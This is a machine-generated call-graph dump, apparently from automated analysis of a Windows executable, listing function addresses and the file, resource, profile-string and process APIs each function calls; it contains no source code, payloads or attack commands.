39664->39678 39666 403ae7 39691 40b1ab ??3@YAXPAX ??3@YAXPAX 39666->39691 39667 403a3f memset 39672 403a2f 39667->39672 39669 403aef 39669->39049 39670 409d1f 6 API calls 39670->39672 39671 409b98 GetFileAttributesW 39671->39672 39672->39666 39672->39667 39672->39670 39672->39671 39673 40a8d0 7 API calls 39672->39673 39673->39672 39675 40a051 GetFileTime FindCloseChangeNotification 39674->39675 39676 4039ca CompareFileTime 39674->39676 39675->39676 39676->39049 39677->39046 39679 414c2e 16 API calls 39678->39679 39680 403c38 39679->39680 39681 409719 2 API calls 39680->39681 39682 403c3f wcscat 39681->39682 39683 414c2e 16 API calls 39682->39683 39684 403c61 39683->39684 39685 409719 2 API calls 39684->39685 39686 403c68 wcscat 39685->39686 39692 403af5 39686->39692 39689 403af5 20 API calls 39690 403c95 39689->39690 39690->39672 39691->39669 39693 403b02 39692->39693 39694 40ae18 9 API calls 39693->39694 39696 403b37 39694->39696 39695 40ae51 9 API calls 39695->39696 39696->39695 39697 403bdb 39696->39697 39698 40add4 wcscmp wcscmp 39696->39698 39701 40ae18 9 API calls 39696->39701 39702 40aebe FindClose 39696->39702 39703 40a8d0 7 API calls 39696->39703 39699 40aebe FindClose 39697->39699 39698->39696 39700 403be6 39699->39700 39700->39689 39701->39696 39702->39696 39703->39696 39705 409d1f 6 API calls 39704->39705 39706 404190 39705->39706 39719 409b98 GetFileAttributesW 39706->39719 39708 40419c 39709 4041a7 6 API calls 39708->39709 39710 40435c 39708->39710 39712 40424f 39709->39712 39710->39074 39712->39710 39713 40425e memset 39712->39713 39715 409d1f 6 API calls 39712->39715 39716 40a8ab 9 API calls 39712->39716 39720 414842 39712->39720 39713->39712 39714 404296 wcscpy 39713->39714 39714->39712 39715->39712 39717 4042b6 memset memset _snwprintf wcscpy 39716->39717 39717->39712 39718->39072 39719->39708 39723 41443e 39720->39723 39722 414866 39722->39712 39724 41444b 39723->39724 39725 414451 39724->39725 39726 4144a3 GetPrivateProfileStringW 39724->39726 39727 414491 39725->39727 39728 414455 wcschr 39725->39728 39726->39722 39730 414495 WritePrivateProfileStringW 39727->39730 39728->39727 39729 414463 _snwprintf 39728->39729 39729->39730 39730->39722 39731->39078 39733 40b2cc 27 API calls 39732->39733 39734 409615 39733->39734 39735 409d1f 6 API calls 39734->39735 39736 409625 39735->39736 39761 409b98 GetFileAttributesW 39736->39761 39738 409634 39761->39738 39997 413f4f 39970->39997 39973 413f37 K32GetModuleFileNameExW 39974 413f4a 39973->39974 39974->39141 39976 413969 wcscpy 39975->39976 39977 41396c wcschr 39975->39977 39981 413a3a 39976->39981 39977->39976 39979 41398e 39977->39979 40002 4097f7 wcslen wcslen _memicmp 39979->40002 39981->39141 39982 41399a 39983 4139a4 memset 39982->39983 39984 4139e6 39982->39984 40003 409dd5 GetWindowsDirectoryW wcscpy 39983->40003 39986 413a31 wcscpy 39984->39986 39987 4139ec memset 39984->39987 39986->39981 40004 409dd5 GetWindowsDirectoryW wcscpy 39987->40004 39988 4139c9 wcscpy wcscat 39988->39981 39990 413a11 memcpy wcscat 39990->39981 39992 413cb0 GetModuleHandleW 39991->39992 39993 413cda 39991->39993 39992->39993 39994 413cbf GetProcAddress 39992->39994 39995 413ce3 GetProcessTimes 39993->39995 39996 413cf6 39993->39996 39994->39993 39995->39143 39996->39143 39998 413f2f 39997->39998 39999 413f54 39997->39999 39998->39973 39998->39974 40000 40a804 8 API calls 39999->40000 40001 413f5f GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 40000->40001 40001->39998 40002->39982 40003->39988 40004->39990 40005->39163 40006->39186 40008 409cf9 GetVersionExW 40007->40008 40009 409d0a 40007->40009 40008->40009 40009->39193 40009->39195 40010->39199 40011->39202 40012->39204 40013->39269 40015 40bba5 40014->40015 40062 40cc26 40015->40062 40018 40bd4b 40083 40cc0c 40018->40083 40023 40b2cc 27 API calls 40024 40bbef 40023->40024 40090 40ccf0 _wcsicmp 40024->40090 40026 40bbf5 40026->40018 40091 40ccb4 6 API calls 40026->40091 40028 40bc26 40029 40cf04 17 API calls 40028->40029 40030 40bc2e 40029->40030 40031 40bd43 40030->40031 40032 40b2cc 27 API calls 40030->40032 40033 40cc0c 4 API calls 40031->40033 40034 40bc40 40032->40034 40033->40018 40092 40ccf0 _wcsicmp 40034->40092 40036 40bc46 40036->40031 40037 40bc61 memset memset WideCharToMultiByte 40036->40037 40093 40103c strlen 40037->40093 40039 40bcc0 40040 40b273 27 API calls 40039->40040 40041 40bcd0 memcmp 40040->40041 40041->40031 40042 40bce2 40041->40042 40043 404423 37 API calls 40042->40043 40044 40bd10 40043->40044 40044->40031 40045 40bd3a LocalFree 40044->40045 40046 40bd1f memcpy 40044->40046 40045->40031 40046->40045 40047->39283 40049 409a74 GetTempFileNameW 40048->40049 40050 409a66 GetWindowsDirectoryW 40048->40050 40049->39280 40050->40049 40051->39321 40052->39321 40053->39321 40054->39321 40055->39321 40056->39321 40057->39321 40058->39321 40059->39321 40060->39296 40061->39318 40094 4096c3 CreateFileW 40062->40094 40064 40cc34 40065 40cc3d GetFileSize 40064->40065 40066 40bbca 40064->40066 40067 40afcf 2 API calls 40065->40067 40066->40018 40074 40cf04 40066->40074 40068 40cc64 40067->40068 40095 40a2ef ReadFile 40068->40095 40070 40cc71 40096 40ab4a MultiByteToWideChar 40070->40096 40072 40cc95 FindCloseChangeNotification 40073 40b04b ??3@YAXPAX 40072->40073 40073->40066 40075 40b633 ??3@YAXPAX 40074->40075 40076 40cf14 40075->40076 40102 40b1ab ??3@YAXPAX ??3@YAXPAX 40076->40102 40078 40bbdd 40078->40018 40078->40023 40079 40cf1b 40079->40078 40081 40cfef 40079->40081 40103 40cd4b 40079->40103 40082 40cd4b 14 API calls 40081->40082 40082->40078 40084 40b633 ??3@YAXPAX 40083->40084 40085 40cc15 40084->40085 40086 40aa04 ??3@YAXPAX 40085->40086 40087 40cc1d 40086->40087 40147 40b1ab ??3@YAXPAX ??3@YAXPAX 40087->40147 40089 40b7d4 memset CreateFileW 40089->39275 40089->39276 40090->40026 40091->40028 40092->40036 40093->40039 40094->40064 40095->40070 40097 40ab6b 40096->40097 40101 40ab93 40096->40101 40098 40a9ce 4 API calls 40097->40098 40099 40ab74 40098->40099 40100 40ab7c MultiByteToWideChar 40099->40100 40100->40101 40101->40072 40102->40079 40104 40cd7b 40103->40104 40137 40aa29 6 API calls 40104->40137 40106 40cef5 40107 40aa04 ??3@YAXPAX 40106->40107 40108 40cefd 40107->40108 40108->40079 40109 40cd89 40109->40106 40138 40aa29 6 API calls 40109->40138 40111 40ce1d 40139 40aa29 6 API calls 40111->40139 40113 40ce3e 40114 40ce6a 40113->40114 40140 40abb7 wcslen memmove 40113->40140 40115 40ce9f 40114->40115 40143 40abb7 wcslen memmove 40114->40143 40117 40a8d0 7 API calls 40115->40117 40121 40ceb5 40117->40121 40118 40ce56 40141 40aa71 wcslen 40118->40141 40120 40ce8b 40144 40aa71 wcslen 40120->40144 40127 40a8d0 7 API calls 40121->40127 40124 40ce5e 40142 40abb7 wcslen memmove 40124->40142 40125 40ce93 40145 40abb7 wcslen memmove 40125->40145 40129 40cecb 40127->40129 40146 40d00b malloc memcpy ??3@YAXPAX ??3@YAXPAX 40129->40146 40131 40cedd 40132 40aa04 ??3@YAXPAX 40131->40132 40133 40cee5 40132->40133 40134 40aa04 ??3@YAXPAX 40133->40134 40135 40ceed 40134->40135 40136 40aa04 ??3@YAXPAX 40135->40136 40136->40106 40137->40109 40138->40111 40139->40113 40140->40118 40141->40124 40142->40114 40143->40120 40144->40125 40145->40115 40146->40131 40147->40089 40148->39337 40149->39344 40159 44def7 40160 44df07 40159->40160 40161 44df00 ??3@YAXPAX 40159->40161 40162 44df17 40160->40162 40163 44df10 ??3@YAXPAX 40160->40163 40161->40160 40164 44df27 40162->40164 40165 44df20 ??3@YAXPAX 40162->40165 40163->40162 40166 44df37 40164->40166 40167 44df30 ??3@YAXPAX 40164->40167 40165->40164 40167->40166 37536 44dea5 37537 44deb5 FreeLibrary 37536->37537 37538 44dec3 37536->37538 37537->37538 40168 4148b6 FindResourceW 40169 4148f9 40168->40169 40170 4148cf SizeofResource 40168->40170 40170->40169 40171 4148e0 LoadResource 40170->40171 40171->40169 40172 4148ee LockResource 40171->40172 40172->40169 37712 415304 ??3@YAXPAX 40173 441b3f 40183 43a9f6 40173->40183 40175 441b61 40356 4386af memset 40175->40356 40177 44189a 40178 442bd4 40177->40178 40179 4418e2 40177->40179 40180 4418ea 40178->40180 40358 441409 memset 40178->40358 40179->40180 40357 4414a9 12 API calls 40179->40357 40184 43aa20 40183->40184 40185 43aadf 40183->40185 40184->40185 40186 43aa34 memset 40184->40186 40185->40175 40187 43aa56 40186->40187 40188 43aa4d 40186->40188 40359 43a6e7 40187->40359 40367 42c02e memset 40188->40367 40193 43aad3 40369 4169a7 11 API calls 40193->40369 40194 43aaae 40194->40185 40194->40193 40209 43aae5 40194->40209 40195 43ac18 40198 43ac47 40195->40198 40371 42bbd5 memcpy memcpy memcpy memset memcpy 40195->40371 40199 43aca8 40198->40199 40372 438eed 16 API calls 40198->40372 40203 43acd5 40199->40203 40374 4233ae 11 API calls 40199->40374 40202 43ac87 40373 4233c5 16 API calls 40202->40373 40375 423426 11 API calls 40203->40375 40207 43ace1 40376 439811 163 API calls 40207->40376 40208 43a9f6 161 API calls 40208->40209 40209->40185 40209->40195 40209->40208 40370 439bbb 22 API calls 40209->40370 40211 43acfd 40216 43ad2c 40211->40216 40377 438eed 16 API calls 40211->40377 40213 43ad19 40378 4233c5 16 API calls 40213->40378 40215 43ad58 40379 44081d 163 API calls 40215->40379 40216->40215 40219 43add9 40216->40219 40383 423426 11 API calls 40219->40383 40220 43ae3a memset 40221 43ae73 40220->40221 40384 42e1c0 147 API calls 40221->40384 40222 43adab 40381 438c4e 163 API calls 40222->40381 40223 43ad6c 40223->40185 40223->40222 40380 42370b memset memcpy memset 40223->40380 40227 43adcc 40382 440f84 12 API calls 40227->40382 40228 43ae96 40385 42e1c0 147 API calls 40228->40385 40231 43aea8 40232 43aec1 40231->40232 40386 42e199 147 API calls 40231->40386 40234 43af00 40232->40234 40387 42e1c0 147 API calls 40232->40387 40234->40185 40237 43af1a 40234->40237 40238 43b3d9 40234->40238 40388 438eed 16 API calls 40237->40388 40243 43b3f6 40238->40243 40247 43b4c8 40238->40247 40239 43b60f 40239->40185 40447 4393a5 17 API calls 40239->40447 40242 43af2f 40389 4233c5 16 API calls 40242->40389 40429 432878 12 API calls 40243->40429 40245 43af51 40390 423426 11 API calls 40245->40390 40256 43b4f2 40247->40256 40435 42bbd5 memcpy memcpy memcpy memset memcpy 40247->40435 40249 43af7d 40391 423426 11 API calls 40249->40391 40253 43af94 40392 423330 11 API calls 40253->40392 40254 43b529 40437 44081d 163 API calls 40254->40437 40436 43a76c 21 API calls 40256->40436 40259 43afca 40393 423330 11 API calls 40259->40393 40260 43b47e 40264 43b497 40260->40264 40432 42374a memcpy memset memcpy memcpy memcpy 40260->40432 40261 43b544 40262 43b55c 40261->40262 40438 42c02e memset 40261->40438 40439 43a87a 163 API calls 40262->40439 40433 4233ae 11 API calls 40264->40433 40266 43afdb 40394 4233ae 11 API calls 40266->40394 40270 43b4b1 40434 423399 11 API calls 40270->40434 40271 43b428 40281 43b462 40271->40281 40430 432b60 16 API calls 40271->40430 40273 43b56c 40276 43b58a 40273->40276 40440 423330 11 API calls 40273->40440 40275 43afee 40395 44081d 163 API calls 40275->40395 40441 440f84 12 API calls 40276->40441 40277 43b4c1 40443 42db80 163 API calls 40277->40443 40431 423330 11 API calls 40281->40431 40283 43b592 40442 43a82f 16 API calls 40283->40442 40286 43b5b4 40444 438c4e 163 API calls 40286->40444 40288 43b5cf 40445 42c02e memset 40288->40445 40290 43b005 40290->40185 40295 43b01f 40290->40295 40396 42d836 163 API calls 40290->40396 40291 43b1ef 40406 4233c5 16 API calls 40291->40406 40293 43b212 40407 423330 11 API calls 40293->40407 40295->40291 40404 423330 11 API calls 40295->40404 40405 42d71d 163 API calls 40295->40405 40297 43b087 40397 4233ae 11 API calls 40297->40397 40298 43add4 40298->40239 40446 438f86 16 API calls 40298->40446 40301 43b22a 40408 42ccb5 11 API calls 40301->40408 40304 43b23f 40409 4233ae 11 API calls 40304->40409 40305 43b10f 40400 423330 11 API calls 40305->40400 40307 43b257 40410 4233ae 11 API calls 40307->40410 40311 43b129 40401 4233ae 11 API calls 40311->40401 40312 43b26e 40411 4233ae 11 API calls 40312->40411 40315 43b09a 40315->40305 40398 42cc15 19 API calls 40315->40398 40399 4233ae 11 API calls 40315->40399 40316 43b282 40412 43a87a 163 API calls 40316->40412 40318 43b13c 40402 440f84 12 API calls 40318->40402 40320 43b29d 40413 423330 11 API calls 40320->40413 40323 43b2af 40326 43b2b8 40323->40326 40327 43b2ce 40323->40327 40324 43b15f 40403 4233ae 11 API calls 40324->40403 40414 4233ae 11 API calls 40326->40414 40415 440f84 12 API calls 40327->40415 40330 43b2c9 40417 4233ae 11 API calls 40330->40417 40331 43b2da 40416 42370b memset memcpy memset 40331->40416 40334 43b2f9 40418 423330 11 API calls 40334->40418 40336 43b30b 40419 423330 11 API calls 40336->40419 40338 43b325 40420 423399 11 API calls 40338->40420 40340 43b332 40421 4233ae 11 API calls 40340->40421 40342 43b354 40422 423399 11 API calls 40342->40422 40344 43b364 40423 43a82f 16 API calls 40344->40423 40346 43b370 40424 42db80 163 API calls 40346->40424 40348 43b380 40425 438c4e 163 API calls 40348->40425 40350 43b39e 40426 423399 11 API calls 40350->40426 40352 43b3ae 40427 43a76c 21 API calls 40352->40427 40354 43b3c3 40428 423399 11 API calls 40354->40428 40356->40177 40357->40180 40358->40178 40360 43a6f5 40359->40360 40366 43a765 40359->40366 40360->40366 40448 42a115 40360->40448 40364 43a73d 40365 42a115 147 API calls 40364->40365 40364->40366 40365->40366 40366->40185 40368 4397fd memset 40366->40368 40367->40187 40368->40194 40369->40185 40370->40209 40371->40198 40372->40202 40373->40199 40374->40203 40375->40207 40376->40211 40377->40213 40378->40216 40379->40223 40380->40222 40381->40227 40382->40298 40383->40220 40384->40228 40385->40231 40386->40232 40387->40232 40388->40242 40389->40245 40390->40249 40391->40253 40392->40259 40393->40266 40394->40275 40395->40290 40396->40297 40397->40315 40398->40315 40399->40315 40400->40311 40401->40318 40402->40324 40403->40295 40404->40295 40405->40295 40406->40293 40407->40301 40408->40304 40409->40307 40410->40312 40411->40316 40412->40320 40413->40323 40414->40330 40415->40331 40416->40330 40417->40334 40418->40336 40419->40338 40420->40340 40421->40342 40422->40344 40423->40346 40424->40348 40425->40350 40426->40352 40427->40354 40428->40298 40429->40271 40430->40281 40431->40260 40432->40264 40433->40270 40434->40277 40435->40256 40436->40254 40437->40261 40438->40262 40439->40273 40440->40276 40441->40283 40442->40277 40443->40286 40444->40288 40445->40298 40446->40239 40447->40185 40449 42a175 40448->40449 40451 42a122 40448->40451 40449->40366 40454 42b13b 147 API calls 40449->40454 40451->40449 40452 42a115 147 API calls 40451->40452 40455 43a174 40451->40455 40479 42a0a8 147 API calls 40451->40479 40452->40451 40454->40364 40469 43a196 40455->40469 40470 43a19e 40455->40470 40456 43a306 40456->40469 40492 4388c4 14 API calls 40456->40492 40459 42a115 147 API calls 40459->40470 40460 415a91 memset 40460->40470 40461 43a642 40461->40469 40496 4169a7 11 API calls 40461->40496 40463 4165ff 11 API calls 40463->40470 40465 43a635 40495 42c02e memset 40465->40495 40469->40451 40470->40456 40470->40459 40470->40460 40470->40463 40470->40469 40480 42ff8c 40470->40480 40488 439504 13 API calls 40470->40488 40489 4312d0 147 API calls 40470->40489 40490 42be4c memcpy memcpy memcpy memset memcpy 40470->40490 40491 43a121 11 API calls 40470->40491 40472 4169a7 11 API calls 40473 43a325 40472->40473 40473->40461 40473->40465 40473->40469 40473->40472 40474 42b5b5 memset memcpy 40473->40474 40475 42bf4c 14 API calls 40473->40475 40478 4165ff 11 API calls 40473->40478 40493 42b63e 14 API calls 40473->40493 40494 42bfcf memcpy 40473->40494 40474->40473 40475->40473 40478->40473 40479->40451 40481 43817e 139 API calls 40480->40481 40482 42ff99 40481->40482 40483 42ffe3 40482->40483 40484 42ffd0 40482->40484 40487 42ff9d 40482->40487 40498 4169a7 11 API calls 40483->40498 40497 4169a7 11 API calls 40484->40497 40487->40470 40488->40470 40489->40470 40490->40470 40491->40470 40492->40473 40493->40473 40494->40473 40495->40461 40496->40469 40497->40487 40498->40487 40520 41493c EnumResourceNamesW 37540 4287c1 37541 4287d2 37540->37541 37542 429ac1 37540->37542 37543 428818 37541->37543 37544 42881f 37541->37544 37558 425711 37541->37558 37557 425ad6 37542->37557 37610 415c56 11 API calls 37542->37610 37577 42013a 37543->37577 37605 420244 97 API calls 37544->37605 37548 4260dd 37604 424251 120 API calls 37548->37604 37551 4259da 37603 416760 11 API calls 37551->37603 37556 429a4d 37560 429a66 37556->37560 37561 429a9b 37556->37561 37558->37542 37558->37551 37558->37556 37559 422aeb memset memcpy memcpy 37558->37559 37563 4260a1 37558->37563 37573 4259c2 37558->37573 37576 425a38 37558->37576 37593 4227f0 memset memcpy 37558->37593 37594 422b84 15 API calls 37558->37594 37595 422b5d memset memcpy memcpy 37558->37595 37596 422640 13 API calls 37558->37596 37598 4241fc 11 API calls 37558->37598 37599 42413a 90 API calls 37558->37599 37559->37558 37606 415c56 11 API calls 37560->37606 37565 429a96 37561->37565 37608 416760 11 API calls 37561->37608 37602 415c56 11 API calls 37563->37602 37609 424251 120 API calls 37565->37609 37568 429a7a 37607 416760 11 API calls 37568->37607 37573->37557 37597 415c56 11 API calls 37573->37597 37576->37573 37600 422640 13 API calls 37576->37600 37601 4226e0 12 API calls 37576->37601 37578 42014c 37577->37578 37581 420151 37577->37581 37620 41e466 97 API calls 37578->37620 37580 420162 37580->37558 37581->37580 37582 4201b3 37581->37582 37583 420229 37581->37583 37584 4201b8 37582->37584 37585 4201dc 37582->37585 37583->37580 37586 41fd5e 86 API calls 37583->37586 37611 41fbdb 37584->37611 37585->37580 37589 4201ff 37585->37589 37617 41fc4c 37585->37617 37586->37580 37589->37580 37592 42013a 97 API calls 37589->37592 37592->37580 37593->37558 37594->37558 37595->37558 37596->37558 37597->37551 37598->37558 37599->37558 37600->37576 37601->37576 37602->37551 37603->37548 37604->37557 37605->37558 37606->37568 37607->37565 37608->37565 37609->37542 37610->37551 37612 41fbf8 37611->37612 37615 41fbf1 37611->37615 37625 41ee26 37612->37625 37616 41fc39 37615->37616 37635 4446ce 11 API calls 37615->37635 37616->37580 37621 41fd5e 37616->37621 37618 41ee6b 86 API calls 37617->37618 37619 41fc5d 37618->37619 37619->37585 37620->37581 37623 41fd65 37621->37623 37622 41fdab 37622->37580 37623->37622 37624 41fbdb 86 API calls 37623->37624 37624->37623 37626 41ee41 37625->37626 37627 41ee32 37625->37627 37636 41edad 37626->37636 37639 4446ce 11 API calls 37627->37639 37630 41ee3c 37630->37615 37633 41ee58 37633->37630 37641 41ee6b 37633->37641 37635->37616 37645 41be52 37636->37645 37639->37630 37640 41eb85 11 API calls 37640->37633 37642 41ee70 37641->37642 37643 41ee78 37641->37643 37698 41bf99 86 API calls 37642->37698 37643->37630 37646 41be6f 37645->37646 37647 41be5f 37645->37647 37653 41be8c 37646->37653 37677 418c63 memset memset 37646->37677 37676 4446ce 11 API calls 37647->37676 37650 41bee7 37651 41be69 37650->37651 37681 41a453 86 API calls 37650->37681 37651->37630 37651->37640 37653->37650 37653->37651 37654 41bf3a 37653->37654 37655 41bed1 37653->37655 37680 4446ce 11 API calls 37654->37680 37657 41bef0 37655->37657 37660 41bee2 37655->37660 37657->37650 37658 41bf01 37657->37658 37659 41bf24 memset 37658->37659 37664 41bf14 37658->37664 37678 418a6d memset memcpy memset 37658->37678 37659->37651 37666 41ac13 37660->37666 37679 41a223 memset memcpy memset 37664->37679 37665 41bf20 37665->37659 37667 41ac52 37666->37667 37668 41ac3f memset 37666->37668 37670 41ac6a 37667->37670 37682 41dc14 19 API calls 37667->37682 37673 41acd9 37668->37673 37672 41aca1 37670->37672 37683 41519d 37670->37683 37672->37673 37674 41acc0 memset 37672->37674 37675 41accd memcpy 37672->37675 37673->37650 37674->37673 37675->37673 37676->37651 37677->37653 37678->37664 37679->37665 37680->37650 37682->37670 37686 4175ed 37683->37686 37694 417570 SetFilePointer 37686->37694 37689 41760a ReadFile 37690 417637 37689->37690 37691 417627 GetLastError 37689->37691 37692 41763e memset 37690->37692 37693 4151b3 37690->37693 37691->37693 37692->37693 37693->37672 37695 4175b2 37694->37695 37696 41759c GetLastError 37694->37696 37695->37689 37695->37693 37696->37695 37697 4175a8 GetLastError 37696->37697 37697->37695 37698->37643 37699 417bc5 37700 417c61 37699->37700 37701 417bda 37699->37701 37701->37700 37702 417bf6 UnmapViewOfFile CloseHandle 37701->37702 37704 417c2c 37701->37704 37706 4175b7 37701->37706 37702->37701 37702->37702 37704->37701 37711 41851e 20 API calls 37704->37711 37707 4175d6 FindCloseChangeNotification 37706->37707 37708 4175c8 37707->37708 37709 4175df 37707->37709 37708->37709 37710 4175ce Sleep 37708->37710 37709->37701 37710->37707 37711->37704 37718 4415ea 37726 4304b2 37718->37726 37720 4415fe 37721 4418ea 37720->37721 37722 442bd4 37720->37722 37723 4418e2 37720->37723 37722->37721 37774 441409 memset 37722->37774 37723->37721 37773 4414a9 12 API calls 37723->37773 37775 43041c 12 API calls 37726->37775 37728 4304cd 37733 430557 37728->37733 37776 43034a memcpy 37728->37776 37730 4304f3 37730->37733 37777 430468 11 API calls 37730->37777 37732 430506 37732->37733 37734 43057b 37732->37734 37778 43817e 37732->37778 37733->37720 37783 415a91 37734->37783 37739 4305e4 37739->37733 37788 4328e4 12 API calls 37739->37788 37741 43052d 37741->37733 37741->37734 37744 430542 37741->37744 37743 4305fa 37745 430609 37743->37745 37789 423383 11 API calls 37743->37789 37744->37733 37782 4169a7 11 API calls 37744->37782 37790 423330 11 API calls 37745->37790 37748 430634 37791 423399 11 API calls 37748->37791 37750 430648 37792 4233ae 11 API calls 37750->37792 37752 43066b 37793 423330 11 API calls 37752->37793 37754 43067d 37794 4233ae 11 API calls 37754->37794 37756 430695 37795 423330 11 API calls 37756->37795 37758 4306d6 37797 423330 11 API calls 37758->37797 37759 4306a7 37759->37758 37760 4306c0 37759->37760 37796 4233ae 11 API calls 37760->37796 37763 4306d1 37798 430369 17 API calls 37763->37798 37765 4306f3 37799 423330 11 API calls 37765->37799 37767 430704 37800 423330 11 API calls 37767->37800 37769 430710 37801 423330 11 API calls 37769->37801 37771 43071e 37802 423383 11 API calls 37771->37802 37773->37721 37774->37722 37775->37728 37776->37730 37777->37732 37779 438187 37778->37779 37781 438192 37778->37781 37803 4380f6 37779->37803 37781->37741 37782->37733 37784 415a9d 37783->37784 37785 415ab3 37784->37785 37786 415aa4 memset 37784->37786 37785->37733 37787 4397fd memset 37785->37787 37786->37785 37787->37739 37788->37743 37789->37745 37790->37748 37791->37750 37792->37752 37793->37754 37794->37756 37795->37759 37796->37763 37797->37763 37798->37765 37799->37767 37800->37769 37801->37771 37802->37733 37805 43811f 37803->37805 37804 438164 37804->37781 37805->37804 37808 437e5e 37805->37808 37831 4300e8 memset memset memcpy 37805->37831 37832 437d3c 37808->37832 37810 437eb3 37810->37805 37811 437ea9 37811->37810 37816 437f22 37811->37816 37847 41f432 37811->37847 37814 437f06 37897 415c56 11 API calls 37814->37897 37818 437f7f 37816->37818 37898 432d4e 37816->37898 37817 437f95 37902 415c56 11 API calls 37817->37902 37818->37817 37820 43802b 37818->37820 37858 4165ff 37820->37858 37822 437fa3 37822->37810 37905 41f638 104 API calls 37822->37905 37827 43806b 37829 438094 37827->37829 37903 42f50e 138 API calls 37827->37903 37829->37822 37904 4300e8 memset memset memcpy 37829->37904 37831->37805 37833 437d69 37832->37833 37836 437d80 37832->37836 37918 437ccb 11 API calls 37833->37918 37835 437d76 37835->37811 37836->37835 37837 437da3 37836->37837 37838 437d90 37836->37838 37906 438460 37837->37906 37838->37835 37922 437ccb 11 API calls 37838->37922 37841 437de8 37921 424f26 123 API calls 37841->37921 37843 437dcb 37843->37841 37919 444283 13 API calls 37843->37919 37845 437dfc 37920 437ccb 11 API calls 37845->37920 37848 41f54d 37847->37848 37852 41f44f 37847->37852 37849 41f466 37848->37849 38093 41c635 memset memset 37848->38093 37849->37814 37849->37816 37852->37849 37856 41f50b 37852->37856 38064 41f1a5 37852->38064 38089 41c06f memcmp 37852->38089 38090 41f3b1 90 API calls 37852->38090 38091 41f398 86 API calls 37852->38091 37856->37848 37856->37849 38092 41c295 86 API calls 37856->38092 37859 4165a0 11 API calls 37858->37859 37860 41660d 37859->37860 37861 437371 37860->37861 37862 41703f 11 API calls 37861->37862 37863 437399 37862->37863 37864 43739d 37863->37864 37866 4373ac 37863->37866 38198 4446ea 11 API calls 37864->38198 37867 416935 16 API calls 37866->37867 37883 4373ca 37867->37883 37868 437584 37870 4375bc 37868->37870 38205 42453e 123 API calls 37868->38205 37869 438460 134 API calls 37869->37883 37872 415c7d 16 API calls 37870->37872 37873 4375d2 37872->37873 37877 4373a7 37873->37877 38206 4442e6 37873->38206 37876 4375e2 37876->37877 38213 444283 13 API calls 37876->38213 37877->37827 37879 415a91 memset 37879->37883 37882 43758f 38204 42453e 123 API calls 37882->38204 37883->37868 37883->37869 37883->37879 37883->37882 37896 437d3c 135 API calls 37883->37896 38180 4251c4 37883->38180 38199 425433 13 API calls 37883->38199 38200 425413 17 API calls 37883->38200 38201 42533e 16 API calls 37883->38201 38202 42538f 16 API calls 37883->38202 38203 42453e 123 API calls 37883->38203 37886 4375f4 37890 437620 37886->37890 37891 43760b 37886->37891 37888 43759f 37889 416935 16 API calls 37888->37889 37889->37868 37892 416935 16 API calls 37890->37892 38214 444283 13 API calls 37891->38214 37892->37877 37895 437612 memcpy 37895->37877 37896->37883 37897->37810 37899 432d65 37898->37899 37900 432d58 37898->37900 37899->37818 38289 432cc4 memset memset memcpy 37900->38289 37902->37822 37903->37829 37904->37822 37905->37810 37923 41703f 37906->37923 37908 43847a 37909 43848a 37908->37909 37910 43847e 37908->37910 37930 438270 37909->37930 37960 4446ea 11 API calls 37910->37960 37914 438488 37914->37843 37916 4384bb 37917 438270 134 API calls 37916->37917 37917->37914 37918->37835 37919->37845 37920->37841 37921->37835 37922->37835 37924 417044 37923->37924 37925 41705c 37923->37925 37929 417055 37924->37929 37962 416760 11 API calls 37924->37962 37926 417075 37925->37926 37963 41707a 11 API calls 37925->37963 37926->37908 37929->37908 37931 415a91 memset 37930->37931 37932 43828d 37931->37932 37933 438297 37932->37933 37934 438341 37932->37934 37936 4382d6 37932->37936 37935 415c7d 16 API calls 37933->37935 37964 44358f 37934->37964 37938 438458 37935->37938 37939 4382fb 37936->37939 37940 4382db 37936->37940 37938->37914 37961 424f26 123 API calls 37938->37961 38007 415c23 memcpy 37939->38007 37995 416935 37940->37995 37943 438305 37947 44358f 19 API calls 37943->37947 37949 438318 37943->37949 37944 4382e9 38003 415c7d 37944->38003 37946 438373 37952 438383 37946->37952 38008 4300e8 memset memset memcpy 37946->38008 37947->37949 37949->37946 37990 43819e 37949->37990 37951 4383cd 37953 4383f5 37951->37953 38010 42453e 123 API calls 37951->38010 37952->37951 38009 415c23 memcpy 37952->38009 37956 438404 37953->37956 37957 43841c 37953->37957 37959 416935 16 API calls 37956->37959 37958 416935 16 API calls 37957->37958 37958->37933 37959->37933 37960->37914 37961->37916 37962->37929 37963->37924 37965 4435be 37964->37965 37966 44360c 37965->37966 37968 443676 37965->37968 37971 4436ce 37965->37971 37975 44366c 37965->37975 38011 442ff8 37965->38011 37966->37949 37967 443758 37980 443775 37967->37980 38020 441409 memset 37967->38020 37968->37967 37970 443737 37968->37970 37972 442ff8 19 API calls 37968->37972 37973 442ff8 19 API calls 37970->37973 37977 4165ff 11 API calls 37971->37977 37972->37970 37973->37967 38019 4169a7 11 API calls 37975->38019 37976 4437be 37981 4437de 37976->37981 38022 416760 11 API calls 37976->38022 37977->37968 37980->37976 38021 415c56 11 API calls 37980->38021 37984 443801 37981->37984 38023 42463b memset memcpy 37981->38023 37983 443826 38025 43bd08 memset 37983->38025 37984->37983 38024 43024d memset 37984->38024 37988 443837 37988->37966 38026 43024d memset 37988->38026 37991 438246 37990->37991 37993 4381ba 37990->37993 37991->37946 37992 41f432 110 API calls 37992->37993 37993->37991 37993->37992 38042 41f638 104 API calls 37993->38042 37996 41693e 37995->37996 37999 41698e 37995->37999 37997 41694c 37996->37997 38043 422fd1 memset 37996->38043 37997->37999 38044 4165a0 37997->38044 37999->37944 38004 415c81 38003->38004 38005 415c9c 38003->38005 38004->38005 38006 416935 16 API calls 38004->38006 38005->37933 38006->38005 38007->37943 38008->37952 38009->37951 38010->37953 38012 442ffe 38011->38012 38013 443094 38012->38013 38016 443092 38012->38016 38027 4414ff 38012->38027 38039 4169a7 11 API calls 38012->38039 38040 441325 memset 38012->38040 38041 4414a9 12 API calls 38013->38041 38016->37965 38019->37968 38020->37967 38021->37976 38022->37981 38023->37984 38024->37983 38025->37988 38026->37988 38028 441539 38027->38028 38029 441547 38027->38029 38028->38029 38030 441575 38028->38030 38031 441582 38028->38031 38032 4418e2 38029->38032 38038 442bd4 38029->38038 38034 42fccf 18 API calls 38030->38034 38033 43275a 12 API calls 38031->38033 38035 4414a9 12 API calls 38032->38035 38036 4418ea 38032->38036 38033->38029 38034->38029 38035->38036 38036->38012 38037 441409 memset 38037->38038 38038->38036 38038->38037 38039->38012 38040->38012 38041->38016 38042->37993 38043->37997 38050 415cfe 38044->38050 38049 422b84 15 API calls 38049->37999 38051 41628e 38050->38051 38056 